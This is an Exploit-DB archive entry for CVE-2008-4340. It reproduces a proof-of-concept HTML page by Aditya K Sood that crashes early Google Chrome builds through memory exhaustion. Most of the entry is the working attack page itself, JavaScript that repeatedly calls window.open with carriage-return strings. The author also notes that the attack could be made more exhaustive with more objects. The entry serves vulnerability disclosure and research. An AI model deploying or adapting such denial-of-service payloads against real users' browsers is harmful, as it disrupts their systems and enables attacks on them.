Google Chrome Browser Carriage Return Null Object Memory Exhaustion

2008-09-24T00:00:00
ID EDB-ID:6554
Type exploitdb
Reporter Aditya K Sood
Modified 2008-09-24T00:00:00

Description

Google Chrome Browser Carriage Return Null Object Memory Exhaustion. CVE-2008-4340. Dos exploit for windows platform

                                        
                                            <html>
<title>Google Chrome Carriage Return Null Object Memory Exhaustion Remote Dos.</title>
<head>
<script language="javascript">

window.open("\r\n\r\n");
window.refresh();
window.open("\r\n\r\n");


</script>
</head>

<body><br><br>
<h2><center>Google Chrome Carriage Return Null Object Memory Exhaustion Remote Denial of Service.<br><br>Proof of Concept</br></br> </center></h2>


<center>
<b>Note:: Keep an eye on the memory consumption in Task Manager.</b><br><br>

<hr></hr>
<b>This POC has been designed with minimum object usage. This can be made more critical when combined with number of objects. For Example:
using alert function will make it more exhaustive.</b></br></br>

<b><br>Aditya K Sood<br> (c) SecNiche Security.<br><a href="http://www.secniche.org">http://www.secniche.org</a></br></b>
<hr></hr></center>
<b>Version Tested:<br><br>Official Build 1798<br>
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US)<br> AppleWebKit/525.13 (KHTML, like Gecko)<br> Chrome/0.2.149.29 Safari/525.13
 <br><br>

Official Build 2200<br>
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) <br>AppleWebKit/525.13 (KHTML, like Gecko) <br>Chrome/0.2.149.30 Safari/525.13
</b>
<hr></hr>
</body>


</html>

# milw0rm.com [2008-09-24]